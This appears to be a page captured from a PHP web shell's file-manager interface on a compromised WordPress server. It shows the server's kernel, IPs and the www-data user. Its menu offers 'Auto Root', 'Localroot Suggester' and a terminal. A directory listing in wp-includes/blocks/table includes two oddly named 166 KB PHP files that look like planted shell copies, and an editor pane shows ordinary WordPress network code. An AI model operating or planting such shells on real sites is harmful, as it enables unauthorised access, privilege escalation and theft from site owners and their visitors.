Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.191.141.17
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
SETer.php
166.01
KB
-rw-r--r--
2025-03-30 05:28
annotations.min-20250514003419.js
5.39
KB
-rw-r--r--
2024-07-16 17:55
block-bindings-20250514173405.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
4.3
KB
-rw-r--r--
2025-04-15 17:44
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-json.php
42.66
KB
-rw-r--r--
2023-02-03 13:35
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class-wp-user.php
22.46
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
comment-date-20250514173159.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comment-date.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comments-title.php
2.71
KB
-rw-r--r--
2024-07-16 17:55
customize-loader.min-20250513213733.js
3.47
KB
-rw-r--r--
2023-02-02 16:36
data.min.js
25
KB
-rw-r--r--
2025-04-15 17:44
default-widgets.php
2.24
KB
-rw-r--r--
2025-04-15 17:44
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
editor-rtl.css
1.56
KB
-rw-r--r--
2024-04-03 05:49
editor-rtl.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
editor.css
856
B
-rw-r--r--
2024-07-16 17:55
editor.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
element.min.js
11.69
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-network-20250514173520.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
post-title.php
2.09
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
sUUyBfCpZ.php
166.01
KB
-rw-r--r--
2025-05-09 05:54
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
speculative-loading.php
8.36
KB
-rw-r--r--
2025-04-15 17:44
style-engine-20250514173207.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style-rtl.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
style.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
theme-rtl.css
261
B
-rw-r--r--
2024-07-16 17:55
theme-rtl.min.css
232
B
-rw-r--r--
2024-07-16 17:55
theme.css
261
B
-rw-r--r--
2024-07-16 17:55
theme.min.css
232
B
-rw-r--r--
2024-07-16 17:55
widgets.min-20250514003222.js
19.56
KB
-rw-r--r--
2025-04-15 17:44
wp-backbone.min.js
2.97
KB
-rw-r--r--
2022-04-08 20:07
Save
Rename
<?php /** * Network API * * @package WordPress * @subpackage Multisite * @since 5.1.0 */ /** * Retrieves network data given a network ID or network object. * * Network data will be cached and returned after being passed through a filter. * If the provided network is empty, the current network global will be used. * * @since 4.6.0 * * @global WP_Network $current_site * * @param WP_Network|int|null $network Optional. Network to retrieve. Default is the current network. * @return WP_Network|null The network object or null if not found. */ function get_network( $network = null ) { global $current_site; if ( empty( $network ) && isset( $current_site ) ) { $network = $current_site; } if ( $network instanceof WP_Network ) { $_network = $network; } elseif ( is_object( $network ) ) { $_network = new WP_Network( $network ); } else { $_network = WP_Network::get_instance( $network ); } if ( ! $_network ) { return null; } /** * Fires after a network is retrieved. * * @since 4.6.0 * * @param WP_Network $_network Network data. */ $_network = apply_filters( 'get_network', $_network ); return $_network; } /** * Retrieves a list of networks. * * @since 4.6.0 * * @param string|array $args Optional. Array or string of arguments. See WP_Network_Query::parse_query() * for information on accepted arguments. Default empty array. * @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids', * or the number of networks when 'count' is passed as a query var. */ function get_networks( $args = array() ) { $query = new WP_Network_Query(); return $query->query( $args ); } /** * Removes a network from the object cache. * * @since 4.6.0 * * @global bool $_wp_suspend_cache_invalidation * * @param int|array $ids Network ID or an array of network IDs to remove from cache. */ function clean_network_cache( $ids ) { global $_wp_suspend_cache_invalidation; if ( ! empty( $_wp_suspend_cache_invalidation ) ) { return; } $network_ids = (array) $ids; wp_cache_delete_multiple( $network_ids, 'networks' ); foreach ( $network_ids as $id ) { /** * Fires immediately after a network has been removed from the object cache. * * @since 4.6.0 * * @param int $id Network ID. */ do_action( 'clean_network_cache', $id ); } wp_cache_set_last_changed( 'networks' ); } /** * Updates the network cache of given networks. * * Will add the networks in $networks to the cache. If network ID already exists * in the network cache then it will not be updated. The network is added to the * cache using the network group with the key using the ID of the networks. * * @since 4.6.0 * * @param array $networks Array of network row objects. */ function update_network_cache( $networks ) { $data = array(); foreach ( (array) $networks as $network ) { $data[ $network->id ] = $network; } wp_cache_add_multiple( $data, 'networks' ); } /** * Adds any networks from the given IDs to the cache that do not already exist in cache. * * @since 4.6.0 * @since 6.1.0 This function is no longer marked as "private". * * @see update_network_cache() * @global wpdb $wpdb WordPress database abstraction object. * * @param array $network_ids Array of network IDs. */ function _prime_network_caches( $network_ids ) { global $wpdb; $non_cached_ids = _get_non_cached_ids( $network_ids, 'networks' ); if ( ! empty( $non_cached_ids ) ) { $fresh_networks = $wpdb->get_results( sprintf( "SELECT $wpdb->site.* FROM $wpdb->site WHERE id IN (%s)", implode( ',', array_map( 'intval', $non_cached_ids ) ) ) ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared update_network_cache( $fresh_networks ); } }